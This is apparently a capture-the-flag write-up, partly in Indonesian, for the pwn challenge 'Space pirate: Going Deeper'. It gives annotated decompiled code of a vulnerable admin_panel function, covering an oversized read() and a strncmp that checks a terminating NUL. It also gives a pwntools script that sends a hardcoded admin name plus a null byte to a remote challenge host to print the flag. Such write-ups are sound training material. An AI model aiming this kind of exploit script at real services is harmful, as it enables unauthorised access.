
Space pirate: Going Deeper

$ file sp_going_deeper
sp_going_deeper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9f094957db0c2401b2ba895893f94941d618463e, not stripped
ld-linux-x86-64.so.2
libc.so.6
HTB{f4k3_fl4g_4_t35t1ng}

Menggunakan tools decompiler, salah satunya IDA

melihat detail fungsi admin_panel

/*
 * admin_panel -- IDA pseudocode of the flag gate (not compilable as-is: __fastcall,
 * __int64, a1DisableMechan and read_num come from the decompiler / the binary).
 *
 * Reaches system("cat flag*") when either
 *   (a) the three arguments equal 0xDEADBEEF, 0x1337C0DE and 0x1337BEEF, or
 *   (b) the first 0x34 bytes of the user buffer equal the admin-name literal.
 *
 * Security-relevant details visible in the frame annotations below:
 *   - buf sits at rbp-0x30 and v6 at rbp-0x8 (0x28 = 40 bytes apart), yet read()
 *     may write 0x39 = 57 bytes.  The write covers rbp-0x30 .. rbp+0x8 inclusive,
 *     i.e. v6 and -- assuming the usual x86-64 frame layout -- the saved rbp plus
 *     the low byte of the return address.  This writeup does not use that
 *     overflow; the flag text ("fl0w_r3d1r3ct") suggests it is the intended route.
 *   - strncmp compares 0x34 = 52 bytes while the literal is 51 characters long, so
 *     the literal's terminating NUL is compared too: the input must carry a 0x00
 *     byte at offset 51 (this is what the exploit script below relies on).
 *
 * Returns the value of the final puts() (decompiler artefact, not meaningful).
 */
int __fastcall admin_panel(__int64 a1, __int64 a2, __int64 a3)
{
  __int64 v4; // [rsp+8h] [rbp-48h]  copy of a3, compared against 0x1337BEEF below
  char buf; // [rsp+20h] [rbp-30h]   user input; shown as 1 byte, but read() writes up to 0x39
  __int64 v6; // [rsp+48h] [rbp-8h]  menu choice; lies inside read()'s 0x39-byte write range

  v4 = a3;
  v6 = 0LL;
  /* Note: a1 is an __int64 but is printed with %x -- only its low 32 bits are shown. */
  printf(
    "[*] Safety mechanisms are enabled!\n"
    "[*] Values are set to: a = [%x], b = [%ld], c = [%ld].\n"
    "[*] If you want to continue, disable the mechanism or login as admin.\n",
    a1,
    a2,
    a3);
  /* Re-prompt until the user picks 1, 2 or 3. */
  while ( v6 != 1 && v6 != 2 && v6 != 3 )
  {
    /* a1DisableMechan is an IDA-named global string (presumably the
     * "Disable mechanism..." prompt), not user-controlled input. */
    printf(a1DisableMechan);
    v6 = read_num();
  }
  if ( v6 == 1 )
  {
    printf("\n[*] Input: ");
  }
  else
  {
    if ( v6 != 2 )
    {
      /* Option 3: leave without ever reaching the read(). */
      puts("\n[!] Exiting..\n");
      exit(6969);
    }
    printf("\n[*] Username: ");
  }
  /* Options 1 and 2 both land here.  Up to 57 bytes are read although only 0x30
   * bytes separate buf from the frame base; the return value is not checked and
   * no NUL terminator is added. */
  read(0, &buf, 0x39uLL);
  /* Either the argument constants match (0xDEADBEEF / 0x1337C0DE / 0x1337BEEF) or
   * the 52-byte compare -- 51 characters plus the literal's NUL -- succeeds. */
  if ( a1 == 3735928559LL && a2 == 322420958 && v4 == 322420463
    || !strncmp("DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft", &buf, 0x34uLL) )
  {
    printf("\n%s[+] Welcome admin! The secret message is: ", "\x1B[1;32m");
    system("cat flag*");
  }
  else
  {
    printf("\n%s[-] Authentication failed!\n", "\x1B[1;31m");
  }
  return puts("\n[!] For security reasons, you are logged out..\n");
}

Input user dibandingkan (strncmp) dengan string DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft yang panjangnya 51 karakter, sedangkan strncmp membandingkan 0x34 = 52 byte, sehingga byte ke-52 (terminator NUL dari literal) ikut dibandingkan:

strncmp("DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft", &buf, 0x34uLL)

Karena sendline() menambahkan '\n' di akhir input, byte ke-52 dari buf akan berisi 0x0a dan tidak cocok dengan NUL pada literal. Maka setelah 51 karakter tersebut perlu ditambahkan satu null byte (\x00) agar strncmp mengembalikan 0 dan flag ditampilkan.

flag.py
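from pwn import *

# Exploit for "Space pirate: Going Deeper" (sp_going_deeper).
#
# admin_panel() reads up to 0x39 bytes into buf and then evaluates
#   strncmp("DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft", &buf, 0x34)
# The literal is 51 characters, but 0x34 = 52 bytes are compared, so the
# literal's terminating NUL is part of the comparison.  sendline() alone would
# put '\n' in that 52nd position, hence the explicit b"\x00" after the name.

url = "68.183.37.6"
port = 30286

# Menu option 1 ("disable the mechanism") leads straight to the read()/strncmp path.
OPSI = b"1"

# 51-character admin name + the NUL byte strncmp expects at offset 51.
ADMIN_NAME = b"DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft"
INPT = ADMIN_NAME + b"\x00"
assert len(ADMIN_NAME) == 51 and len(INPT) == 0x34  # must match strncmp's length


def connect():
    """Return a tube to the local binary (`python flag.py LOCAL`) or the remote instance."""
    if args.LOCAL:
        return process("./sp_going_deeper")
    return remote(url, port)


def solve():
    """Drive the menu, send the admin name + NUL, and return everything the service printed."""
    target = connect()

    # Banner ("[*] Safety mechanisms are enabled!" ...) followed by the menu prompt;
    # the prompt string itself is not visible in the listing, so just consume it.
    print(target.recv())

    print(OPSI)
    target.sendline(OPSI)
    # After option 1 the binary prints "\n[*] Input: " right before read().
    print(target.recvuntil(b"Input: "))

    print(INPT)
    target.sendline(INPT)  # 53 bytes including '\n', within the 0x39-byte read
    # Read until the service closes: "[+] Welcome admin! ..." + flag + logout line.
    out = target.recvall(timeout=5)
    print(out.decode(errors="replace"))
    target.close()
    return out


if __name__ == "__main__":
    solve()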

flag HTB{n0_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_fl0w_r3d1r3ct}

Referensi/Solusi lain